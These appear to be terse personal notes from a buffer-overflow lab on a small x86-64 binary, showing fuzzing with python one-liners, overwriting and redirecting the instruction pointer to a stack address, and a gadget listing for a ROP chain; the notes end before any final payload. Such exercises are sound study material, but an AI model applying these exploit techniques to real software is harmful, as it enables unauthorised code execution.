1. Fuzz

#: python -c 'print "A" * 13' > buf

0x00000a4141414141

	- print function is causing a newline "\x0a"
	- sys.stdout.write("A") to stdout without newline "\x0a"

:# python -c 'import sys; sys.stdout.write("AAAAAAAAAAAAAA")' > buf


0x0000414141414141


2. Overwrite EIP

:# python -c 'import sys; sys.stdout.write("AAAAAAAABBBBBB")' > buf


0x0000424242424242

3. Redirect Program Flow. Point RIP to offset of "A".

python -c 'import sys; sys.stdout.write("AAAAAAAA\x64\xe1\xff\xff\xff\x7f")' > buf

Stopped reason: SIGSEGV
0x00007fffffffe164 in ?? ()
gdb-peda$ x/20x $rip
0x7fffffffe1b4:	0x4141414141414141

4. Obtain Gadgets

cat rop-gadgets 
Gadgets information
============================================================
0x0000000000400170 : adc byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x000000000040016e : add al, ch ; adc byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x000000000040017e : add al, ch ; add byte ptr [rax], al ; add byte ptr [rax], al ; syscall
0x000000000040016c : add byte ptr [rax], al ; add al, ch ; adc byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x000000000040017c : add byte ptr [rax], al ; add al, ch ; add byte ptr [rax], al ; add byte ptr [rax], al ; syscall
0x0000000000400180 : add byte ptr [rax], al ; add byte ptr [rax], al ; syscall
0x0000000000400181 : add byte ptr [rax], al ; add byte ptr [rdi], cl ; add eax, 0x5fc358c3 ; ret
0x000000000040015c : add byte ptr [rax], al ; ret
0x0000000000400182 : add byte ptr [rax], al ; syscall
0x0000000000400183 : add byte ptr [rdi], cl ; add eax, 0x5fc358c3 ; ret
0x0000000000400185 : add eax, 0x5fc358c3 ; ret
0x0000000000400187 : pop rax ; ret
0x0000000000400189 : pop rdi ; ret
0x000000000040018d : pop rdx ; ret
0x000000000040018b : pop rsi ; ret
0x000000000040015e : ret
0x0000000000400184 : syscall

Unique gadgets found: 17
